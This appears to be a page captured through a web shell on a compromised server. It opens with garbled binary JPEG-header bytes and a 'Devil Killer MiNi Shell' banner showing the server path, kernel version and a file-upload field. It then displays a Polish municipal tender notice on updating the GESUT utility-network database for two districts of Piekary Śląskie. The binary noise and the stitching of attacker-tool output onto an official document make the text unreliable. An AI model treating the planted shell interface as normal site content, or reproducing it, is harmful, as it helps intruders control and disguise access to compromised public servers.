JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200302/518868-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 518868-N-2020 z dnia 2020-03-02 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Prezydent Miasta Piekary Śląskie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostosowanie bazy GESUT dp przepisów rozporządzenia w sprawie powiatowej bazy GESUT i krajowej bazy GESUT z 21 października 2015 roku dla obrębów Brzozowice Kamień i Brzeziny Śląskie - etap III.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Prezydent Miasta Piekary Śląskie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Bytomska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">84</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">41-940</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Piekary Śląskie</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">323 939 379</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">um@um.piekary.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">32 287 22 69</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.piekary.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.piekary.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemni</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miasta Piekary Śląskie 41-940 Piekary Śląskie ul. Bytomska 84</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostosowanie bazy GESUT dp przepisów rozporządzenia w sprawie powiatowej bazy GESUT i krajowej bazy GESUT z 21 października 2015 roku dla obrębów Brzozowice Kamień i Brzeziny Śląskie - etap III.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BZP.271-9/GK/20</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Ogólny zakres prac:1)Wykonanie dostosowania istniejącej bazy danych do obowiązujących przepisów polegające na:a) uzupełnieniu atrybutów opisowych we wszystkich obiektach bazy danych GESUT,b) weryfikacji i poprawie segmentacji przewodów uzbrojenia podziemnego,c) weryfikacji, poprawie i wprowadzeniu obiektów GESUT oraz odpowiednich relacji tych obiektów t.j. trójniki, złącza kablowe, studzienki, komory , włazy, zawory, zasuwy, latarnie itd.,d) weryfikacji i poprawie położenia punktów wejścia/wyjścia do/z budynków.2) przeprowadzenie kontroli dostosowanej i uzupełnionej bazy danych GESUT3) skompletowanie operatu, sporządzenie sprawozdania technicznego i przygotowanie prac do odbioru.Aby zapewnić ciągłość pracy UM ODGK (nie blokować obiektów) prace muszą być wykonywane w systemie Geo-Info 7.Wszystkie prace należy wykonać z uwzględnieniem obowiązujących przepisów, w szczególności: •Ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne (jednolity tekst Dz. U. z 2020 r. poz. 276), •Rozporządzenia Ministra Administracji i Cyfryzacji z dnia 21 października 2015 r. w sprawie powiatowej bazy GESUT i krajowej bazy GESUT( Dz. U. z 2015 poz. 1938),•Rozporządzenia Ministra Administracji i Cyfryzacji z dnia 5 września 2013 r. w sprawie organizacji i trybu prowadzenia państwowego zasobu geodezyjnego i kartograficznego (Dz. U. z 2013 r. poz.1183),•Rozporządzenia Ministra Administracji i Cyfryzacji z dnia 2 listopada 2015 r. w sprawie bazy danych obiektów topograficznych oraz mapy zasadniczej (Dz. U. z 2015 r. poz. 2028).II. CHARAKTERYSTYKA OBIEKTU ORAZ OPIS SYSTEMU, W KTÓRYM PROWADZONA JEST GEODEZYJNA EWIDENCJA SIECI UZBROJENIA TERENU2.1. Podstawowe informacje o obiekcie zawierają poniższe tabele:Nazwa	Identyfikator TERYTWojewództwo Śląskie 24Miasto Piekary Śląskie 2471Obręb Brzozowice Kamień	247101_1.0003Obręb Brzeziny Śląskie 247101_1.0004W jednostce ewidencyjnej Piekary Śląskie, w obrębach Brzozowice Kamień i Brzeziny Śląskie występują następujące sieci uzbrojenia terenu:Obręb: Brzozowice Kamień, Brzeziny ŚląskieLp.	Rodzaj sieci	Całkowita długość matematyczna (sieć i przyłącza) [km]1.	Sieć elektroenergetyczna 214.342.	Sieć kanalizacyjna 124.703.	Sieć telekomunikacyjna 108.234.	Sieć wodociągowa 104.955.	Sieć gazowa 51.306.	Przewody specjalne 1.187.	Sieć ciepłownicza 17.78	Razem: 622.48Obręb: Brzozowice Kamień, Brzeziny ŚląskieLp.	Rodzaj sieci	Ilość przyłączy1.	Sieć elektroenergetyczna	2494 (1369 podziemne, 1225 napowietrzne)2.	Sieć kanalizacyjna 40733.	Sieć telekomunikacyjna 7224.	Sieć wodociągowa 24345.	Sieć gazowa 21776.	Przewody specjalne 527.	Sieć ciepłownicza 227	Razem: 12179Długość przyłączy została wliczona w całkowitą długość matematyczną sieci.Ilość studni kanalizacyjnych ujawnionych w bazie GESUT – 5352.Ilość studni teletechnicznych ujawnionych w bazie GESUT – 1005.2.2. Baza danych obiektów topograficznych (BDOT 500)Baza prowadzona jest w systemie GEO-INFO 7 dla całej jednostki ewidencyjnej.2.3. Baza geodezyjnej ewidencji uzbrojenia terenu (GESUT).Baza prowadzona jest w systemie GEO-INFO 7 dla całej jednostki ewidencyjnej w oparciu o przepisy rozporządzenia Ministra Administracji i Cyfryzacji z dnia 2 lutego 2013 r. w sprawie bazy danych geodezyjnej ewidencji sieci uzbrojenia terenu, bazy danych obiektów topograficznych oraz mapy zasadniczej (Dz. U. z 2013, poz.383).Baza ta jest w pełni obiektowa, co oznacza, że każdy z odwzorowywanych elementów przestrzeni topograficznej posiada charakterystykę, obejmującą jego atrybuty przestrzenne, atrybuty opisowe, atrybuty redakcji kartograficznej oraz pełną historię zmian atrybutów.System umożliwia eksport danych w następujących formatach: .GIF, TANGO, GML.III.SZCZEGÓŁOWY ZAKRES PRAC PRZEWIDYWANYCH DO WYKONANIA ORAZ ŹRÓDŁA DANYCH EWIDENCYJNYCH I METODY ICH POZYSKANIA.Dostosowanie bazy geodezyjnej ewidencji sieci uzbrojenia terenu ewidencji gruntów i budynków przeprowadzone zostanie zgodnie z zasadami określonymi w rozporządzeniu Ministra Administracji i Cyfryzacji z dnia 21 października 2015 r. w sprawie powiatowej bazy GESUT i krajowej bazy GESUT (Dz. U. z 2015 poz. 1938).Przygotowanie i przekazanie dokumentacji geodezyjnej znajdującej się w zasobie nastąpi etapami obejmującymi zakresy danych uzgodnione pomiędzy Wykonawcą pracy a Ośrodkiem.1. Uzupełnienie atrybutów opisowych we wszystkich obiektach bazy danych GESUTWe wszystkich obiektach bazy danych GESUT prowadzonej na dotychczasowych zasadach (77 079 obiektów) należy uzupełnić następujące atrybuty opisowe:a) Numer – w obiektach punktowych - punkt pikiety z operatu, jeśli atrybut ‘Źródło pozyskania danych’ = ‘O’ lub ‘A’ lub ‘Z’.b) Data pozyskania danych – zgodnie z informacją na szkicu polowym, a w przypadku wektoryzacji rastra steroretypem <<Voidable>>.c) Status obiektu – domyślnie należy wpisać wartość „Czynny”, chyba, że dokumentacja źródłowa stanowi inaczej. Dla 28 941 obiektów w bazie wartość ta jest pusta.d) Przebieg – atrybut uzupełniany dla osi odcinków przewodów oraz urządzeń zgodnie z materiałem źródłowym. Dla 33 794 obiektów w bazie wartość jest pusta.e) Liczba przewodów – zgodnie z materiałem źródłowym. Uzupełnić dla 7532 obiektów.f) Operaty techniczne – Identyfikatory materiałów zasobu, z których pozyskano dane o obiekcie.g) Identyfikator uzgodnienia – Identyfikator wniosku dotyczącego uzgodnienia danego obiektu na naradzie koordynacyjnej lub numer ZUD.h) Inne atrybuty obowiązkowe wynikające z rozporządzenia, oznaczone przy danym kodzie obiektu w systemie szarym lub czerwonym wykrzyknikiem lub steroretypem <<Voidable>>.Atrybut ‘Wiązka przewodu’ przyjmuje zawsze wartość „tak”, gdy liczba przewodów większa niż 1 (nie dotyczy przypadku, gdy każdy przewód jest mierzony i wprowadzany do bazy danych jako osobny obiekt o liczbie przewodów równej 1).Atrybut „Data pozyskania danych” uzupełniamy tylko w przypadku gdy ‘Źródło pozyskania danych’ = ‘O’,’A’,’Z’. W przypadku, gdy brak w operacie daty pozyskania danych uzupełniamy atrybutem specjalnym <<Voidable>> o treści: „brak danych”. W bazie znajdują się obiekty z metodą pozyskania danych Digitalizacja, które mają uzupełnioną datę pozyskania danych. Datę należy usunąć.Atrybut „Średnica urządzenia” i „Kształt urządzenia” jest obowiązkowy dla obiektów typu studzienka i właz, w przypadku gdy brak jest wymiarów studzienki w materiałach źródłowych, w atrybucie stosujemy wartość atrybutu specjalnego <<Voidable>> „brak danych”.Jeśli w bazie występują rury ochronne, które nie mają wypełnionego obowiązkowego atrybuty Liczba rur – należy wprowadzić wartość 1.2. Weryfikacja i poprawa segmentacji przewodów uzbrojenia podziemnegoDla wszystkich prowadzonych w GESUT sieci należy wykonać segmentację wg poniższych zasad:przewody GESUT należy segmentować w następujących przypadkach:a) na granicach jednostek ewidencyjnych,b) w punktach węzłowych, w przypadku łączenia się przewodów o tej samej wartości atrybutów „rodzaj sieci” i „funkcja przewodów”.Przewody GESUT określone jako „przyłącze” nie segmentują przewodów rozdzielczych i przesyłowych, przewody GESUT o funkcji przewodu „rozdzielczy” nie segmentują przewodów przesyłowych.Zmiana wartości atrybutów: źródło, istnienie, eksploatacja, funkcja przewodu, przebieg, średnica przewodu, wymiar poziomy przewodu, wymiar pionowy przewodu,wiązka, liczba przewodów, średnica obudowy, wymiar poziomy obudowy, wymiar pionowy obudowy, liczba rur dla fragmentu obiektu powoduje jego segmentację. W przypadku, gdy istniejący w bazie danych obiekt z bazy GESUT (np. przewód kanalizacyjny) jest kontynuowany w innym materiale źródłowym (pomiar kolejnej części w innym operacie technicznym), a nie zmieniają się atrybuty (cechy obiektu) i nie ma podstaw do segmentacji przewodu, modyfikujemy istniejący obiekt (kontynuujemy geometrię/łączymy przewody) wpisując kolejny operat w atrybucie „Operaty techniczne”.Przewody GESUT nie podłączone do sieci głównych (miejskich czy gminnych) należy wprowadzić jako sieci lokalne.Wyjątek mogą stanowić sieci GESUT nie połączone z sieciami miejskimi na terenach przemysłowych, biurowych, osiedlowych np. dawna kanalizacja przemysłowa, kanalizacja deszczowa przy obiektach szkolnych, sportowych. Istniejące w bazie odcinki sieci kanalizacyjnej (sanitarnej i deszczowej), które wchodzą do budynku i kończą się obiektem: „Dalszy przebieg nieznany” i nie są podłączone do sieci miejskiej – zmienić na sieci lokalne.W przypadku sieci kanalizacyjnej nie połączonej z siecią miejską, a podłączonej do dołu Chambeau – wprowadzamy przewód kanalizacyjny lokalny oparty na punktowym lub powierzchniowym obiekcie „Osadnik kanalizacji lokalnej”.Komory kanalizacyjne powierzchniowe nie podłączone do żadnej sieci pozostają bez zmian. Podłączone do sieci lokalnej – zmienić na „Osadniki kanalizacji lokalnej”.Sieci kanalizacyjne lokalne podłączone do sieci miejskiej zmienić ich rodzaj na rodzaj sieci z którą się łączą (np. w drodze).Scalić sieci, które były segmentowane pod kątem atrybutu materiału oraz ID branżowego, gdyż zgodnie z rozporządzeniem nie powoduje to segmentacji przewodu.3.Weryfikacja, poprawa i wprowadzenie obiektów GESUT oraz odpowiednich relacji tych obiektów t.j. trójniki, złącza kablowe, studzienki, komory , włazy, zawory, zasuwy, latarnie itd. Dla wszystkich prowadzonych w GESUT punktów węzłowych sieci oraz włączeń przyłączy do przewodów rozdzielczych należy wykonać weryfikację, poprawę i wprowadzenie tych obiektów wg poniższych zasad:- punkty węzłowe sieci oraz włączenia przyłączy do przewodów rozdzielczych muszą mieć nadany odpowiedni kod obiektu w definicji przewodów:a) woda – punkt inny, komora lub studzienka,b) kanalizacja – punkt inny, komora lub studzienka, w przypadku gdy kanalizacja wpada do rowu, rzeki – wylot kanału,c) telekomunikacja, elektroenergetyka – punkt inny, komora lub studzienka, szafa kablowa, słup, wieża lub maszt, złącze dla przewodów światłowodowych,d) gaz – punkt inny,e) ciepłownicze – punkt inny,f) sieci specjalne – odpowiednio od typu – punkt inny.W przypadku definiowania obiektu na sieciach GESUT o kodzie „Punkt inny”, który ma inną funkcję niż punkt załamania np. mufa, punkt wejścia do sieci, złącze (inne niż światłowodowe), w polu „Uwagi” obiektu GUPxPI należy wpisać tekst odpowiednio: mufa, pkt wejścia do sieci, złącze.•	obiekt „Trójnik” stosujemy tylko i wyłącznie jako obiekt „trójnik zaślepiony”. W przypadku punktów węzłowych, gdy brak innego urządzenia technicznego stosujemy obiekt „ Punkt inny”.Trójniki do poprawy:- ciepłownicze – 127,- wodociągowe – 2414,- kanalizacyjne – 406,- gazowe – 1119,• obiekt „Złącze kablowe” stosujemy tylko i wyłącznie w punktach węzłowych przy sieciach teletechnicznych w przypadku światłowodów, wtedy również uzupełniamy atrybut „Zasobnik”. (175 złącz kablowych w bazie).Należy sprawdzić 532 obiekty wprowadzone w bazie kodem GUPEZC – zmiana cech przewodu (przewody energetyczne) i wprowadzić odpowiedni obiekt.Nie dublować obiektów (te same współrzędne – inne obiekty).W obecnie prowadzonej bazie danych GESUT istnieją obiekty zaklasyfikowane jako „inne urządzenia techniczne”. W celu doprowadzenia do zgodności z rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 21 października 2015 r. w sprawie powiatowej bazy GESUT i krajowej bazy GESUT (Dz. U. z 2015 poz. 1938), należy poprawić:- 575 inne urządzenia techniczne sieci energetycznej GUPEUI wg. następujących zasad - jeśli w polu "dotychczasowy kod obiektu" wpisano "złącze kablowe" zamienić obiekt GUPEUI na obiekt Punkt inny GUPEPI oraz wpisać w polu 